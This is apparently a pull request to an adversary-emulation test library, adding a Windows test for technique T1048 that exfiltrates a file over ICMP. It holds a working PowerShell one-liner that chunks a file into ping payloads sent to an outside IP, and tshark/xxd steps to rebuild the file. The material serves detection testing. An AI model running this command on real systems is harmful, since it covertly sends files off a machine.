### PR TITLE
Add ICMP exfiltration test to T1048

### DIFF
--- a/atomics/T1048/T1048.md
+++ b/atomics/T1048/T1048.md
@@ -10,6 +10,8 @@
 
 - [Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP](#atomic-test-3---exfiltration-over-alternative-protocol---http)
 
+- [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
+
 
 <br/>
 
@@ -79,4 +81,23 @@ A firewall rule (iptables or firewalld) will be needed to allow exfiltration on 
     wget http://VICTIM_IP:1337/victim-file.txt
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP
+Exfiltration of specified file over ICMP protocol.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
+| ip_address | Destination IP address where the data should be sent. | String | 1.1.1.1|
+
+#### Run it with `powershell`!
+```
+$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
+```
 <br/>

--- a/atomics/T1048/T1048.yaml
+++ b/atomics/T1048/T1048.yaml
@@ -91,3 +91,25 @@ atomic_tests:
       3. To retrieve the data from an adversary system:
 
           wget http://VICTIM_IP:1337/victim-file.txt
+
+- name: Exfiltration Over Alternative Protocol - ICMP
+  description: |
+    Exfiltration of specified file over ICMP protocol.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    input_file:
+      description: Path to file to be exfiltrated.
+      type: Path
+      default: C:\Windows\System32\notepad.exe
+    ip_address:
+      description: Destination IP address where the data should be sent.
+      type: String
+      default: 1.1.1.1
+
+  executor:
+    name: powershell
+    command: |
+      $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }


### PR DESCRIPTION
**Details:**
Add test to T1048 to exfiltrate data over ICMP. Implemented with powershell. By default sends C:\Windows\System32\notepad.exe to IP address 1.1.1.1 via ICMP.

**Testing:**
Tested with Windows 10 x64 (1809) and a destination was linux server. PCAP was captured on the windows host and sanitized (mac + ip(s)). After that the data was filtered to show only echo requests (icmp.type == 8) as otherwise you'd get duplicate data. Data field was extracted from ICMP request packets by using tshark and converted back to binary format.

Verified sha256sum of extracted and original file and they do indeed match.

Steps to reproduce:
1. Download attached pcap and extract it.
2. tshark -r T1048.pcap -T fields -e data | tr -d '\n' > notepad.data
3. xxd -r -p notepad.data notepad.exe

**Associated Issues:**
None

**Attachment:**
[T1048.zip](https://github.com/redcanaryco/atomic-red-team/files/3103518/T1048.zip)
